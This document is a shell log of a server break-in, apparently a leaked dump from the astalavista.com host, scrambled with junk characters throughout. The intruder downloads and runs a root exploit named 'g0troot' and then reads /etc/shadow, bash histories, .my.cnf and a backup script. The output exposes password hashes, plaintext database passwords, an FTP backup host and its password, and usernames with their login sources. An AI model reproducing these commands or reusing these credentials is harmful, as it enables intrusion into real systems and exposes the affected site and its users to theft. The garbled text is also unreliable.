sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]) X/ z! R/ W, d$ U0 s) n4 u/ v
–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]
7 n5 U. ]8 m# CResolving anti.sec.labs… 13.33.33.37$ H# P  [* `( B& ^& V( ^
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
, j1 `' O& e2 ^! tHTTP request sent, awaiting response… 200 OK
' c2 q: `8 @0 H  b% [, H+ E+ [1 MLength: 18200 (18K) [text/plain]) h) F8 L/ }) |+ m6 L8 }" }) X" b" d
Saving to: `g0troot’
9 I) n$ k( v% f: V! T
3 E% b( K# \$ K7 |, `% V100%[=========================================================================================================================================>] 18,200      58.6K/s   in
# N& N6 ?% x' G+ N$ ?0.3s
5 v) B+ U0 ^& t* Y& e
" i4 A! I, Z9 S  _3 N( a18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
4 F8 ^# L6 Y9 J! U
% M/ c! W7 c, h- csh-3.2$ ./g0troot -i x86_64# ?% e: p# Q" Y5 n
[+] g0troot - anti.sec.labs
/ }# `' e# [0 ~5 s& S& W* u[+] Target: 2.6.18-128.1.10.el5
7 G6 p7 Z; A. P  w  b[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
. a0 S; Y' ]8 O; _0 K
; X- z, Z- v+ W[+] r00tr00t
7 W& _9 V& U5 W  T$ \! @; B[~] Executing shell…7 y/ P, J; e! D! w
8 V' h6 J, _4 J) ^- ]: W
sh-3.2# id1 x% q5 z2 ?: I/ p% b& T& \
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
& B$ a' {# z$ l* {" d% K' j3 \6 J% \% e
sh-3.2# cat /etc/shadow
4 q* B" _" [( q. v5 {8 Nroot1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
( ~% e8 J  V% K1 T* O! S[snip]
0 _! K0 U3 l" ]3 t1 }admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
$ \/ g, G) d" I% l3 c) Kjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
" y; m5 |: E( n* `) R  Q4 Qcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
. l2 S( a# [3 k9 a7 |2 Q; iastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
" L9 d: K, i( V: J" E& y1 \) n# Q' `
9 @# e% E* k: v, K: c4 ]9 z) }* Ksh-3.2# cat /etc/motd) _* t: B/ u9 U  G; k
#####################################################
0 K9 p3 |+ m/ I0 m# g#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #
. ^% {0 C" j4 h9 S5 C/ m# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #
- f& w. Z1 W: V9 ]* n6 t# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #& S/ A, |. z$ u) M
#                                                   #& s$ R( w0 W, g2 \' x
#####################################################
: i+ ~1 H, @# ]* A#                                                   #; y2 ^; q! @" c% d2 P. E4 h- j
# Admin Contact - 链接标记support@secureservertech.com      #/ o' C6 s" c$ G# l4 `
#                                                   #
# x3 |1 d& d% l5 [1 n# Available ShortCuts                               #- s" Q) F) J" N/ v  K
#                                                   #! p' y" H2 `5 l5 i6 g
# nst -  list active connections                    #
  S* |2 [5 T3 g1 o# ddos - shows how many times each ip is connected  #5 U' \8 Y! S3 @- o1 t
# ltr -  restart the webserver                      #6 ]3 v7 \, O- S7 \2 n% d# E, h
# phpc - edit the php config file                   #
; u3 g: W9 u% D% \- Q2 A' k: [2 z# htc -  edit the webserver configuration file      #
9 s5 z6 [) n! h1 b# N  P# up -   uptime                                     #4 Y* a& u5 r8 `. P: p- d
# etd - edit the motd of the day file               #
2 r7 A1 b; V( K& K! F  q7 ~- O# htr - start and restart apache if needed          #( f( ?! [0 ?3 P' U
# syng - shows active SYN_RECV connections          #
2 E4 W7 _+ L: X* ?# synd - syn flood blocker - “synd -h” for usage    #
; Q" @4 G4 x+ \( j0 p#####################################################, l* A9 G$ y) a
# NOTES:                                            #6 q8 h$ T& K7 ]$ i
# Last Upgrade - 12-08-2008 by JF                   #) c) v2 q2 q+ l3 X8 _, K) K
# My.cnf/Mysql Optimization - 1-28-09               #
" ?  y9 J" X( m1 ?' M* ?#                                                   #
: a; q% d( z- _4 ~2 v#                                                   #7 I$ _9 D7 C' i4 U$ c9 \& V" P
#                                                   #
9 ^% i: h3 T6 P& q. O#####################################################
& I( \+ S  \9 S9 d' k
! M: w5 f7 H1 N' S, N2 B) U, {sh-3.2# lastlog | grep -v Never, z0 o& V/ H  c0 ^1 y7 K
Username         Port     From             Latest0 }( _3 A/ V% m% M& W
root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009
+ |# [. G, {0 t& Madmin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 20083 H8 @7 o* B( v0 L- H; J+ h$ K
com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009& |  Q' Y0 @7 d( V/ [! m
astanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009$ E* B. _& D" ~% B, j

2 o( o$ U, s  ~) P( Y! A* _8 psh-3.2# ls -la
3 E% Z& T; ^! A4 D. i5 C! Htotal 453376; ?' Z* Y# f- v" F4 Z
drwxr-x— 15 root root       4096 Jun  4 08:40 .
) S# P" R$ `! Z3 o8 |; ndrwxr-xr-x 25 root root       4096 Jun  3 02:43 ..
) u% V& N2 F! z1 }-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip
, y2 A0 [3 X& Y5 |- I-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg
! C# a" h5 ~! e$ h% i-rw——-  1 root root      16836 Jun  4 07:21 .bash_history& }% s( Y8 A# I+ b5 F0 l/ _' ?/ [
-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout
+ K# Q$ B3 ^6 O+ g( h* S. E& w-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile9 x& Z* N4 H) O3 ~" k
-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc; c0 Y6 e4 x& f3 A# }
-rwx——  1 root root       1899 Oct 28  2007 bk.sh
, A, M4 D0 `! ]6 e! y& v+ o-rw-r–r–  1 root root       1327 Nov 29  2007 cert
. m8 B# F& e7 A( C7 D-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql
! p* e; h7 X0 q- _  ]9 ydrwxr-xr-x  4 root root       4096 May 20  2008 .cpan
0 Z1 d: d+ A6 D; c( O2 _* y-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc4 a& `( f3 ?2 d+ ?! U
-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql
( _6 N" M+ m4 \4 _drwx——  2 root root       4096 Oct 28  2007 .elinks
1 A5 u) Y& X% |: v# idrwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.13 @4 h2 _' P1 \" V6 e5 g1 W
-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2' u! V& T4 e" Y/ o: j9 B. S% `
-rw——-  1 root root          0 Apr 16 13:19 .history& m8 u- \/ w$ R. q3 f* g
-rw-r–r–  1 root root      16095 Sep 11  2007 install.log- `2 @4 ]4 {5 z: i
-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog! l0 Z  G# ]6 \8 y
-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh
9 L' n9 O; n7 X1 J-rw——-  1 root root         35 Jun  2 14:23 .lesshst
+ H* J7 P. N3 Cdrwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp' R* n, Q4 b9 n( u
drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec
0 s8 z$ c8 a" ^# X9 l$ F8 H% X8 F-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz% ?7 A) P& V1 b4 g' n) j# X
-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2# L" j( Q( g& }" Z; v' E9 K
-rwx——  1 root root        760 Sep 18  2008 lp
) A' a2 \1 S- b- _& h8 _+ Y* n1 Cdrwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.19 k8 G. u3 D% ^+ v2 C2 h
-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz0 X4 v4 x, U8 p% A, K
-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.12 J0 O: [& X) H
drwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.99 K$ o4 V) P# D' E. e
-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz+ g7 I( e7 x3 V# s3 c; P
drwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3) M! l# J' K3 g' M, c: c- A
-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz# G+ ?8 {+ m$ G  ~+ _9 a' d
-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh
1 t% U4 w" M2 P& Z: U( y-rw——-  1 root root         41 Oct 19  2007 .my.cnf
7 @: K8 P3 L$ `  x: l7 r* [-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history% R- [) d0 |2 W# K: u$ ]5 g( Q& s
-rwx——  1 root root      38873 Apr 16  2008 mysqlreport' q' h6 j& F" F7 v9 w  q$ B5 _
-rw——-  1 root root         41 May 20  2008 .mytop7 L! e. E) H, Q0 U
drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6
, F; ^" x. x, c. _+ c1 ]-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
+ O7 B# ~0 j. ^0 \drwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp6 ~% P) U1 i; K6 M' Z' i( H9 r0 l8 g
-rw——-  1 root root       1462 Sep 21  2007 opt.php
8 E2 g- o6 \" l; p( ^- U-rw-r–r–  1 root root       3371 Sep 22  2007 p  r% u" Q3 }0 F' k4 p% W- g
-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz20 \! U0 }" |2 k" P0 C
-rw——-  1 root root       1024 Feb  3 21:32 .rnd. B7 o4 l- z2 T, E7 [
-rw-r–r–  1 root root        716 Nov 28  2007 server.csr
  j- k1 G0 ]' X4 [% s1 |-rw-r–r–  1 root root        887 Nov 28  2007 server.key
" J' \+ L& _) m' B( c0 u2 udrwx——  2 root root       4096 Oct 10  2008 .ssh& d; `! m* C! a6 ]$ Q
-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat, c" f4 [, \: Y( d& _
-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc0 F$ c3 e; o$ V, T% N# k
-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip7 |3 j( x# |2 u4 }6 L6 ~
-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.1
. [0 U! j% K' I) x8 Fdrwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
2 `( U+ ]+ ^0 ^' r. B2 r-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh
: O+ r) s- Q" V0 |8 ^; jdrwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
) p$ m# l& q3 U" ]/ G1 }. `# ^-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
9 Q# A( p. b& Q9 W! `# f3 X-rw——-  1 root root      12997 May 16  2008 .viminfo$ k6 _8 d5 }: C9 `' N# V9 _: d

; v1 F3 T5 S9 z! D8 [% z+ |sh-3.2# cat .bash_history
: W+ A. B2 d4 P& x0 n[snip]" B  i6 ^& U5 W" N, ]/ J
wget cp4sst.com/sstlinux.tar.gz+ w9 s7 \/ A# n* v! p
tar zxvf sstlinux.tar.gz
3 O5 r9 l; i  d5 s- w) }cd linux-2.6.27.10& Q6 R1 q4 Q+ u, u: y- T
sh install.sh' K1 l4 v5 o2 v# ]
make bzImage ; make modules ; make modules_install ; make install
% n7 B4 [8 N* b; ^0 e1 K5 @make clean% J1 ?' `6 u3 m; |
service mysqld restart% R9 r& P* ~: F, F8 m
[snip]
6 }' D+ V3 Q3 h7 i& m% Gcd /usr/sbin/- P( d. m9 T' X5 ~
chmod 4777 traceroute7 m: ^7 A2 r- b
chmod 4777 ping" y7 J) m' @9 g" r; Y
traceroute -I 链接标记[url]www.astalavista.ch[/url]
7 J  s3 F3 a: ?) s( K[snip]
9 x3 [- Z6 B& B# }  Yvi /etc/csf/csf.conf
* _7 H. x, P' d/ R  B( Ztraceroute google.ch6 v  I3 \1 y1 l* s$ B
service csf restart
3 y% u; V9 @  u1 d3 G! vtracert google.ch% k0 y7 j0 P  w" u3 X! v" ~  A
service csf restart
: c, T7 ^# k- b/ Y, |1 u5 |traceroute 链接标记[url]www.google.ch[/url]6 T  i1 ~- i) s; e! v4 U& T
tracert 链接标记[url]www.google.ch[/url]" \- i& `9 E5 O0 |% S
traceroute 链接标记[url]www.google.ch[/url]" h6 r/ @  L3 s+ g$ }8 L- T
locate traceroute
! f& v+ N$ y1 @: ^5 M6 B; O  {chown 4755 /bin/traceroute
. x# s7 ~; e+ L2 }1 l. T6 Ichown 4777 /bin/traceroute
: u8 ?) i1 U& m: [9 @: p/ l5 _locate ping
$ s: @* {% O/ Q6 q/ ^chown 4755 /bin/ping, ?. r, x4 X4 f' F5 U) ~
chown 4777 /bin/ping$ K$ X; G- C0 n' ?: o
cd /bin/: A- r( V3 H. r& A+ R
ls -ali | grep ping
8 C; Q3 W7 q6 achown root ping1 `& i, w* V  _$ E# s1 J: A+ y, ~
chmod 4755 ping: j% Y. f  C/ Y+ S  K9 x
ls -ali | grep traceroute, Y. O5 s# d# F) n* F
chown root traceroute+ h, p* o" r; h4 r# @& P
chmod 4755 traceroute( O; Z. H/ Q$ X7 O1 t
ls -ali | grep traceroute- Z$ _; G% U7 [6 @# \
traceroute -I 链接标记[url]www.google.ch[/url]& F  x6 ^6 m/ v! _. \, W8 q
traceroute 链接标记[url]www.google.ch[/url]
6 K! n7 A2 V  }) F0 [8 ^0 Rwhois pmsantos.ch
' F3 l% j  B8 R# i* B9 H0 |" w* a[snip]
1 n8 M' R. V, J* a, Pmysql -h com_contrexx2_live < /root/defaultp_ports.sql
3 x- g& {1 k; m& Nmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
& b1 M' i, s+ ^1 i1 C# n" {5 l2 u8 ymysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
; z( n- }+ k% {5 Xmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql/ Q* B# j  M* N
top4 {, y) p( H7 z4 j
ping ssth.ch
: @4 {% z9 F& A* i5 |4 Eping asdlkfaljgasd???ljg???lasj.ch# R5 ]0 k& p% k6 U& T
ping asdlkfaljgasdlasj.ch' ?+ M7 B3 w& G' J
ping 链接标记[url]www.ssth.ch[/url]
2 z- k) f+ U9 Q/ M6 a; @: pping ssth.ch
  [# R! y4 z4 y1 M3 `! Z; t. Q+ Anslookup 链接标记[url]www.google.ch[/url]/ V  T& `1 ?4 Y* B
nslookup 链接标记[url]www.ssth.ch[/url]  h' j' O8 t# G, ^6 ~' P- I
man nslookup6 r2 M1 }( Q$ r. h
ping 链接标记[url]www.google.ch[/url]
, S7 I* W* B- Z5 r, l- ]+ e( \nslookup 链接标记[url]www.google.ch[/url]( g5 g9 Z* g; L, v/ Y
nslookup 链接标记[url]www.google.ch[/url]6 D7 G5 Y6 B" {$ [" q
nslookup salfjasdlf.ch
+ h" [/ L4 p# F) B: J- g[snip]
. U4 I# T# k; G  a0 u% Wopenssl passwd -1 sadf* m0 o1 Z9 N( p, i8 e
openssl passwd -1 5cZNHstdTy, Z2 n; n  ?, g
mysql
( X9 ?6 Z1 e$ R) w- K. k& e4 }mysql
3 F8 U9 y' |+ Qlocate proftp
0 ]/ y0 A: ]5 Q$ V7 p2 Uvi /etc/proftpd.passwd+ s" k% r! C! N" t0 ?/ T: I- K
service proftpd restart, K  T  u( I7 C% E: O
locate proftpd.conf
5 e7 n; C& C; X% }vi /etc/proftpd.conf" u  v' L$ o$ P- p
vi /etc/proftpd.passwd
! N, g" x5 @" q! Bservice proftpd restart
* k  A7 ~( k# N2 {[snip]" L$ f2 Z4 v& l4 F4 C. O
/bin/sh /home/com/backup_system/backup.sh
( ]5 M7 d& m9 M  `- itar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
6 k( i) `9 y1 W( }8 a$ \mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
; O2 ?) H4 M+ q5 S3 kmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql8 \' a' u* j) F/ S/ b
ls -ali" s5 C* |  l' M$ ~) q# u' K' d. m
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql2 G+ W7 M% U5 W: M
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
/ d" i" X$ N: I2 C+ Wcrontab -l
/ A5 [' C( M0 i- x! r. E0 Rcrontab -l
) Z7 j, {  }, K: J/ P+ Vphp -q /home/com/public_html/modifications/cronjobs/securitynews.php" d% z4 ?; O  B( v+ n! T
/home/com/public_html/modifications/cronjobs/exploits.sh
3 @' B, }: F1 V& j. ^0 |7 Gwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
  ^8 W' Z2 y' r7 `+ mtar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz$ G5 g0 f% u# n: Y1 ?
cd lsws-4.0.3  s* R" j! A. [
sh install.sh- n9 }4 g. u- @' R6 E) n
uptime
. [0 S) z& z+ \* ?hdparm -tt /dev/sda
  O/ {/ M  S& C* Liostat
. K/ }* \' _! E; X0 E2 c4 wyum install iostat3 W2 k! H' h* e! n6 G: E- S
iostat# |0 Z; ^. d/ o8 V, V: J
whereis iostat% C) b+ v% d: Y3 @: t8 x* e+ E
yjm clean all* B0 h. R, q- @
yum clean all ; yum -y update( Y9 U. H/ a1 c  _
iostat
/ U& A; Q; `1 R3 W3 Y- c- g' gyum install systat6 h- ?% V5 f  p( G: g3 ]
rpm -qa | grep iostat
% A- u3 w3 d) ?& A9 a  Vrpm -qa | grep sysstat& j, }5 r* H: Q3 i
rpm -qa | grep systat
5 o- B0 D/ F6 Y: F2 v% Ydmesg -c
" k% s0 W& T8 {3 }" J4 B4 S/ }sysctl -p4 p- t3 Z% z  J+ v/ D# c: O
uname -r5 R$ a& X' C$ M9 t
cd /usr/src
7 q" N* E+ Z  w2 }8 s; Ywget nix101.com/kernels/sstlinux.tar.gz
" b$ P, d& `; hshutdown -r now
& h6 A1 o3 s; R" i6 Xnano -w /boot/grub/grub.conf
( g: B2 ?9 \* P% x9 }7 T& U" U) ^% K$ Q
sh-3.2# cat .my.cnf( {' ?* t! J3 i/ o
[client]
) K1 W; j  J$ Y# i) euser=da_admin0 j# Y& W* I8 X2 M6 q4 S
password=X9dctmRH
" _* q% a9 T8 K% C0 Y2 ~! M* E' _8 U# h, G& e% v2 c
sh-3.2# cat /home/com/backup_system/backup.sh
; a; U' v1 @; }" D  Z( c- S) C#!/bin/sh
; a5 U! J3 k: _#####################################################################
" H3 c7 M5 v# @9 h& ^- s  V6 C#                                                                   #
# R/ [" G% I) T$ y% J2 w#   incremental backup for astalavista.com                          #
& B2 J1 `- R* O7 G* H5 K1 X$ B#                                                                   #2 D3 u- N+ o) P, B: V& c0 {5 ~
#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #7 W4 V2 W' u5 n( D8 B. z" v2 o$ {7 I
#                                                                   #
( n- i. s( \6 G* M#####################################################################
8 ?$ n  _6 d/ B4 X[snip]
% G" U6 q- F6 o) @+ U. PPROG_DIR=”/home/com/backup_system”;8 {) ]$ e% W( ?( {
BACKUP_DIR=”/home/com/backups”;
$ R" W/ }. r5 d  I5 X$ I$ tDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;1 t  _. b/ a3 E3 T! v% u8 H
# ftp for synology backup server
5 S+ q  p4 q0 M* ^FTP_HOST=”212.254.194.163″;: j2 q& |" U* `- m8 X  v. O
FTP_PORT=”21″;
# f" u$ s: R" C& L- h* HFTP_USER=”astalavista.com”;- |' E6 w1 j+ X5 u9 a
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;3 U5 k+ l+ g1 j$ A) Y! L
FTP_DIR=”/astalavista.com”;
2 E# l( C1 q( ~# database
, I0 u: \5 a* R4 m; O( YDB_HOST=”localhost”;
$ [+ ?7 a0 i4 ?8 CDB_USER=”contrexxuser2″;2 Q5 X; I3 l: o. F8 a5 ^. m
DB_PASS=”0fEYNZgXz1pKe”;
5 m; m3 @. x& Y5 {+ t( K8 VDB_DATABASE1=”com_contrexx2_live”;* s. x' O' T6 C9 R: b6 X, {
DB_DATABASE2=”com_contrexx2″;
: ]# i" f4 j! Y" H2 c  k[snip]
. {: [& I' |& g5 A1 m$ g0 yftp -in $FTP_HOST $FTP_PORT <<EOF
  x( S6 L8 Z* r9 j3 h; R, jquote USER $FTP_USER
) d- v% R/ v; z! {3 m9 }quote PASS $FTP_PASS
. D- c) s+ m; y& L- [5 Acd $FTP_DIR
  a, h) A" t2 b" Z  V; Hput $DB_FULLNAME-SQL_Dump.tar  s: f/ [9 a6 o' E
put $BACKUP_FULLNAME-Public_HTML.tar
! `  w9 T, {. q) U$ g; N  M; c1 n# Q& Tclose
1 Z# l/ F( u# g% T5 u& x5 r! z6 ibye/ }- o% m' x! O+ ?. S
EOF: `, ~: P1 q9 `) j5 {' x
9 z5 Y, B6 m. B+ ~
sh-3.2# cd /home% }% `- e( i; ^2 m; s# [
sh-3.2# ls -la
" H  V# G2 M4 c2 ]& b+ l7 \total 120
. x% d: x; V6 H6 Q2 H0 H3 @  Rdrwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
- e! B$ y4 v; r0 q1 A6 o7 Gdrwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
' b+ e7 ]0 e! F' ^4 S! Kdrwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
2 a: p; M: S; ~: P-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group* Q& `  v0 T) v+ I, o% Q- h
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user& P: k* f2 {  N2 m( @
drwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet# O# K( t9 L- `9 E+ I( S
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
+ ^5 n# |0 }/ T8 V$ }- vdrwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
% F; i8 s, X5 V, ?  edrwx–x–x 10 com     com      4096 Apr 28 12:40 com
% |6 F8 b0 ], t5 |! v# ]' m, Mdrwxr-xr-x  2 root    root     4096 May 17  2007 ftp
: V! K: c# ~; v  M1 ?: ]$ \drwx——  3 jon     jon      4096 Sep 21  2007 jon
* e" R& n+ {' ~drwx——  2 root    root    16384 Sep 11  2007 lost+found* r$ n2 X- `0 O0 q' z
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
+ c/ |6 T+ ?" }9 E0 C# ~6 d- Sdrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata7 O+ Q8 r7 |! F- y# s& L. z
drwx——  2 jon     jon      4096 Sep 15  2007 test
( H- z, c. ^/ n" w- d1 Pdrwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
+ [! A. b. ?% y9 }( j+ p" W$ q
' b: ~: M" H& X" Z; ~sh-3.2# cd admin. D9 \% l7 T0 S9 e  S6 v
sh-3.2# ls -la
+ E6 b9 b3 [3 L( C- atotal 1735896: I1 t: X  j  o2 w/ L/ D# t
drwx–x–x  9 admin admin       4096 Nov 28  2007 .
3 Z0 u+ Y( i. T2 ?& Idrwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..
8 X6 m+ X0 a2 T2 h1 [' x% }+ idrwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups
( J) k2 Z% M& ^drwx——  2 admin admin       4096 Sep 28  2007 backups
9 i8 [/ X# h, n! F$ ], o5 |-rw——-  1 admin admin        860 Sep 17  2008 .bash_history
$ |, }5 r2 Y) D; ~( V-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout& x; M% q' F2 f3 m
-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile
- a( i7 n0 K" A& g/ y-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc
+ e# @  C# z  \* odrwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups
/ x  z6 J/ Y" j0 R, @/ h6 A; X0 gdrwx–x–x  6 admin admin       4096 Sep 21  2007 domains
  O+ [, h: i! \% \% l. Ddrwxrwx—  3 admin mail        4096 Sep 21  2007 imap" _) T' e+ V; V, ]4 q
-rw-r–r–  1 root  root          24 Sep 21  2007 info.php$ u+ d1 t( b9 e
drwx——  2 admin admin       4096 Sep 21  2007 mail. r5 r3 b. w0 Z4 y
-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr( r  `( g. E& j; l
-rw-r–r–  1 root  root         887 Nov 28  2007 server.key: u* h' _5 d& e/ G- R1 B. f. Q
-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow
* m+ d) C  c; C  h-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz, [3 I- x- [% {0 ?8 K$ S
drwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups
5 T1 i3 C% s* h/ M) s1 x! x3 z, A8 _# ?& f4 V) V
sh-3.2# ..
- Q; T+ f% B1 l. n  C& ash-3.2# cd jon! X, T& g0 Y& D9 n  i
sh-3.2# ls -la
  v& q+ B0 |- @3 q) R4 [total 36  u- G2 Y' k$ ^, N, u$ R
drwx——  3 jon  jon  4096 Sep 21  2007 .# K2 p6 K2 t: A! N/ e3 I1 R# Q( b
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
/ X  M( B! B' s-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history" b+ [' X6 ^# `: t# o  y' S! n
-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout0 Z( b6 p; s6 Y
-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile
' l" _) j  `/ f) }& A- C; a' X- p8 ]-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc
3 n+ z: p; r' @; H) U! z-rw-r–r–  1 root root   24 Sep 21  2007 info.php
) j, L* y3 U' D5 q7 idrwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html: K+ u/ H) s, l
- z3 y7 _7 C; w
sh-3.2# cd ..
2 ?# t1 r* L( S9 |' F' J2 i) Rsh-3.2# cd test
, Y* k5 U3 Z+ E* Psh-3.2# ls -la
/ R0 l/ u; h7 L  jtotal 48
. v4 p6 b; L, y: p7 y1 x) Z) ^drwx——  2 jon  jon  4096 Sep 15  2007 .1 N% a0 h+ M" @" u/ w/ D8 o7 T
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
7 ?; s, \2 W: c% D) A5 [/ s+ ~+ I-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history6 @5 q6 A& r! q. I8 a/ m* v
-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout
, z7 W# l0 {9 t6 b) E-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile
; o9 M  c! J* W: T+ f1 t# d5 A-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc
" a, r$ \4 r5 B7 D* u+ K8 z7 F: Hsh-3.2# cat .bash_history
& o# \  S0 c' k% g" {# U; C6 L3 p! A: b/usr/bin/mysqladmin -u root password PoliuJhytg67
1 v) h' f9 @0 g5 \
. e0 [3 W% d. \9 |sh-3.2# cd ..
/ |% `2 Y+ z9 K2 x# csh-3.2# cd astanet
2 Z/ J  x9 P  l6 T, [3 U# Zsh-3.2# ls -la
/ i0 z5 c& y2 ~1 X- U* S* |) y8 }3 ztotal 52+ Y( h! X# n# s0 M% K- o7 Q
drwx–x–x  6 astanet astanet 4096 Jun  4 09:51 .' }. y( z" i3 {. ?, k
drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
' s8 \. a. p7 d' Pdrwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth) h1 I7 j: W: p# \! X# Q8 {
-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
5 g# B1 V8 [: b-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout8 i  |- r& n( u1 K8 w/ `
-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
6 J' h; n6 ^7 R& e# @" k- m$ _-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc
! y6 g" }1 p: P7 w7 j* h9 Idrwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
. G" L% B* [" c, U1 Wdrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
, ^  l' f, r8 s6 c; m% W7 |/ H/ L. z6 j- ldrwx——  2 astanet astanet 4096 Dec 23 12:18 mail7 I1 _2 S  H. K7 R# i
